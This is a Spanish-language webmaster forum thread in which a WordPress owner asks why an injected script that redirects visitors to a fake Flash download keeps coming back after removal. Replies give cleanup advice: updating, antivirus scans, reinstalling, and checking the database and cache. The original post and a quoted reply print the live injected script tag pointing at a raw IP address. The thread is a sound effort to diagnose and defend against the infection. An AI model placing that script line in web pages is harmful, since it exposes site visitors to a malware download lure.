Cómo eliminar inyección de código que regresa repetidamente

  • Autor Autor juanguis
  • Fecha de inicio Fecha de inicio
juanguis

juanguis

Delta
Verificación en dos pasos activada
Verificado por Whatsapp
Hola gente como les va?

Estoy teniendo un problema en uno de mis sitios, hace un par de dias entrando al home salia un aviso de que necesitaba instalar un plugin para visualizar el contenido del sitio. Automaticamente enviaba a una pagina para SUPUESTAMENTE descargar flash, pero si entran directamente a la IP del codigo inyectado manda a otro sitio.

La primera vez encontre el codigo insertado en un widget de texto, lo elimine y se soluciono todo.

Al otro dia pasa lo mismo, pero el codigo lo encuentro en el index.php, lo elimino y se soluciona. Al otro dia lo mismo, y asi sucesivamente, si lo elimino vuelve a aparecer.

El codigo es este:

HTML: 
< script src="http://50.116.9.110/br/flashplayer/download"></script >

Mire archivo por archivo y no hay nada, alguien sabe como solucionarlo?

Gracias!
 
juanguis dijo:
Hola gente como les va?

Estoy teniendo un problema en uno de mis sitios, hace un par de dias entrando al home salia un aviso de que necesitaba instalar un plugin para visualizar el contenido del sitio. Automaticamente enviaba a una pagina para SUPUESTAMENTE descargar flash, pero si entran directamente a la IP del codigo inyectado manda a otro sitio.

La primera vez encontre el codigo insertado en un widget de texto, lo elimine y se soluciono todo.

Al otro dia pasa lo mismo, pero el codigo lo encuentro en el index.php, lo elimino y se soluciona. Al otro dia lo mismo, y asi sucesivamente, si lo elimino vuelve a aparecer.

El codigo es este:

HTML: 
< script src="http://50.116.9.110/br/flashplayer/download"></script >

Mire archivo por archivo y no hay nada, alguien sabe como solucionarlo?

Gracias!
Hacer clic para expandir...

de seguro tu WP esta bugeado...
- Actualiza todos los plugin
- Si el theme usa thinithumb actualiza a la ultima version y elimina el cache
- Actualiza el WP

Si aun tienes problemas es que te metieron una shell que permite acceder a tu server. En ese caso, podrias descargar el WP y pasarle el antivirus.
 
¿Tienes algún plugin extraño?
 
Al admin de forobeta también le sucedió lo mismo con el mismo código, igual busca sus post ya que lo publico hace días y le perdí el rastro
 
cicklow dijo:
de seguro tu WP esta bugeado...
- Actualiza todos los plugin
- Si el theme usa thinithumb actualiza a la ultima version y elimina el cache
- Actualiza el WP

Si aun tienes problemas es que te metieron una shell que permite acceder a tu server. En ese caso, podrias descargar el WP y pasarle el antivirus.
Hacer clic para expandir...

Lo que hice fue bajar los archivos del blog, subirlos a virustotal y me detecto tres:

WS.Reputation.1
TROJ_GEN.F47V0214
Trojan/PHP.Injecter

Parece que esta ahi el problema voy a borrar todo wp y volverlo a instalar. Creen que eso solucionaria el problema?


WindHack dijo:
¿Tienes algún plugin extraño?
Hacer clic para expandir...

No, los mismos de siempre, nunca me dieron problemas, son todos "de confianza"
 
juanguis dijo:
Lo que hice fue bajar los archivos del blog, subirlos a virustotal y me detecto tres:

WS.Reputation.1
TROJ_GEN.F47V0214
Trojan/PHP.Injecter

Parece que esta ahi el problema voy a borrar todo wp y volverlo a instalar. Creen que eso solucionaria el problema?
Hacer clic para expandir...

sisi. o podrias sacar el virus de los archivos. te dijo en que archivos estan?¿
 
Bueno es evidente que tu sitio esta infectado, lo único que te recomiendo es reinstalar WP desde cero, que creo que ya lo estas haciendo.

Si los problemas continúan, avisa.
 
MoneyMan dijo:
Bueno es evidente que tu sitio esta infectado, lo único que te recomiendo es reinstalar WP desde cero, que creo que ya lo estas haciendo.

Si los problemas continúan, avisa.
Hacer clic para expandir...
Gracias! Si, mejor reinstalo WP y listo 😉

cicklow dijo:
sisi. o podrias sacar el virus de los archivos. te dijo en que archivos estan?¿
Hacer clic para expandir...
No no me dice en que archivos, mejor reinstalo es menos esfuerzo 😛

Jorge02 dijo:
Al admin de forobeta también le sucedió lo mismo con el mismo código, igual busca sus post ya que lo publico hace días y le perdí el rastro
Hacer clic para expandir...
Busque pero no encontre nada, si veo que no lo soluciono le pregunto directo a el, jeje.
 
¿El theme que tienes es original o nulled?
En todo caso, una reinstalación total solucionará el problema.
 
WindHack dijo:
¿El theme que tienes es original o nulled?
En todo caso, una reinstalación total solucionará el problema.
Hacer clic para expandir...
El theme es el twenty eleven, pero no esta actualizado a la ultima version porque me olvide de hacer un tema hijo y no quiero perder modificaciones, igualmente con esto voy a cambiar de plantilla asi evito problemas.

---------- Post agregado el 04-may-2013 hora: 00:22 ----------

Elimine todo wordpress, incluida la plantilla, subi todo de nuevo y sigue el problema, no se que carajos puede ser.
 
Por lo que veo es un virus que esta en tu wp por algun sitio bien escondido, te recomiendo que lo escanees con avira antivirus ahi te mostrara cual de ellos esta infectado y tambien te indicara en que archivo esta el virus, descarga todo tu web y escanealo, cuando digo todo es todo XD, una vez me paso algo igual, por eso te lo digo.
 
Elimine todo wordpress, incluida la plantilla, subi todo de nuevo y sigue el problema, no se que carajos puede ser.
Hacer clic para expandir...

Has mirado la base de datos de wordpress?
 
Debe ser el theme.. Y por ahi se infiltraron. Te recomiendo hacer una instalacion nueva de wordpress lo mas rapido posible.
 
Borraste la caché?
 
Si hablas con tu hosting a lo mejor ellos pueden solucionar tu problema. ¿Lo has probado? Por otra parte, es de admirar lo bien que te lo colaron el virus, debe de estar bien escondido... 😵
Saludos!!
 
Seguramente tengas un rootkit o un backdoor, normalmente sucede por instalar cosas nulled.
 
Gracias a todos por la ayuda! Al final anoche cuando dije que seguia igual todo incluso luego de haber reinstalado y reemplazado el theme, espere un rato y se arreglo. Probablemente era que estaba cacheado algo en el servidor (ya que habia hasta eliminado todos los plugins).

Hasta ahora no volvio a aparecer, y espero que ya no lo haga 😛
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

rafadizeosp
  • Cerrado
Consulta sobre inyección de código en Dreamweaver 2017
Respuestas
4
Visitas
499
adriano1703
A
Atrás
Arriba